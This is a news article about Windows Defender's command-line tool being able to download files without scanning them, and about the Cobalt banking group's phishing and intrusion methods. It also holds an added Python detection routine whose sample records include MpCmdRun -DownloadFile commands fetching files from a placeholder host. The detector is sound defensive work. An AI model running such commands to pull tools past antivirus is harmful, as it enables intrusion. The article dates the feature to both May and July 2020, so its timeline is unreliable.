After the May update of Windows 10, the antivirus built into the operating system gained an entirely new and potentially dangerous feature: the ability to download files, from both the local network and the Internet, via the command line.

A security review of this function showed that it can be used to download a file that the antivirus would otherwise have blocked; in other words, the built-in antivirus does not scan the files it downloads this way.

Security researcher Mohammad Askar demonstrated this by downloading Cobalt Strike (software designed to test system defences) through the download function of the Windows Defender command-line tool.
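As an added example, not from the original post or from the researcher it cites, the following detection routine scans constructed process-creation records (modelled on Sysmon event fields) for the behaviour described above. It assumes the Defender command-line tool is MpCmdRun.exe and that its download option is the -DownloadFile switch with -url and -path arguments; the article names none of these.

```python
import re
from typing import Dict, List

# Constructed process-creation records; values are made up for this example.
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "cmdline": r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -DownloadFile -url http://example.invalid/tool.bin -path C:\Users\Public\tool.bin'},
    {"pid": 4122, "image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "cmdline": r'MpCmdRun.exe -downloadfile -url "\\fileserver\share\build tools.zip" -path "C:\Temp\build tools.zip"'},
    {"pid": 4130, "image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "cmdline": r"MpCmdRun.exe -Scan -ScanType 2"},          # benign full scan
    {"pid": 4140, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -Command Get-Date"},
]

# Matches "-url <value>" / "-path <value>", where the value may be quoted and contain spaces.
_ARG = re.compile(r'-(url|path)\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)


def parse_switch_values(cmdline: str) -> Dict[str, str]:
    """Return the -url and -path values from a command line (keys lower-cased)."""
    out: Dict[str, str] = {}
    for m in _ARG.finditer(cmdline):
        out[m.group(1).lower()] = m.group(2) if m.group(2) is not None else m.group(3)
    return out


def classify_source(url: str) -> str:
    """Label the download origin: Internet (http/https), LAN share (UNC or file:), or other."""
    if re.match(r"^https?://", url, re.IGNORECASE):
        return "internet"
    if url.startswith("\\\\") or url.lower().startswith("file:"):
        return "lan-share"
    return "other"


def detect_defender_downloads(events: List[dict]) -> List[dict]:
    """Flag every record where MpCmdRun.exe is invoked with -DownloadFile."""
    findings = []
    for ev in events:
        image_name = ev["image"].replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if image_name != "mpcmdrun.exe" or "-downloadfile" not in ev["cmdline"].lower():
            continue
        args = parse_switch_values(ev["cmdline"])
        url = args.get("url", "")
        findings.append({"pid": ev["pid"], "source": classify_source(url),
                         "url": url, "path": args.get("path", "")})
    return findings


if __name__ == "__main__":
    for finding in detect_defender_downloads(SAMPLE_EVENTS):
        print(finding)
```

Both the Internet download and the LAN-share download are reported; the routine scan and the unrelated PowerShell process are not.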

Cobalt Strike was originally designed for penetration testing. It includes Beacon, a multifunctional Trojan that serves as its main payload and provides extensive remote-control capabilities. Attackers used it to install a program on ATMs that interacts with the ATM's XFS framework and issues the command to dispense cash.

In 2017, 21 attacks on Russian banks were carried out using Cobalt Strike, 11 of which succeeded. 240 credit institutions were affected, and the criminals stole 1.156 billion rubles from them.

The Cobalt Strike program gave its name to the Cobalt group, which has been known since 2016 and specializes in cyber attacks on banks, exchanges, insurance companies and investment funds in order to steal money. Suppliers and contractors of financial organizations have also been hit: the criminals use their infrastructure and the accounts of real employees to send phishing emails. This approach earned a high level of trust from recipients and helped the emails avoid being blocked by filtering systems on mail servers.

The criminals used innocuous email subjects, content and attachment names: “procedure for determining the amount of penalties”, “Invoice for servicing your ATMs”, “documents for signature”, “balance reconciliation”. The emails carried various malicious attachments: a document with an exploit (.doc, .rtf, .xls), an archive containing an executable dropper (.exe, .scr), or an archive containing an LNK file.

To avoid immediate detection of the malware on the network, the criminals operated mainly at night, covered their tracks by deleting data, and made heavy use of legitimate, publicly available programs for gaining access and spreading through the network: Ammyy Admin, TeamViewer, Mimikatz, PsExec, SoftPerfect Network Scanner.

According to the REGNUM news agency, the developers are unlikely to have added this feature so that PC users could download viruses from the network in this way, but the possibility exists, and it appears to have been added to Windows 10 in the OS update of July 2020.

IA REGNUM also reported that Microsoft has removed the ability to disable Windows Defender. This change likewise followed the latest (May 2020) update of Windows 10.

Previously, Windows Defender could be disabled permanently by changing the registry, but Microsoft now describes this as an “outdated parameter”.

Copyright © 2015 - 2020 GPD Host All right reserved.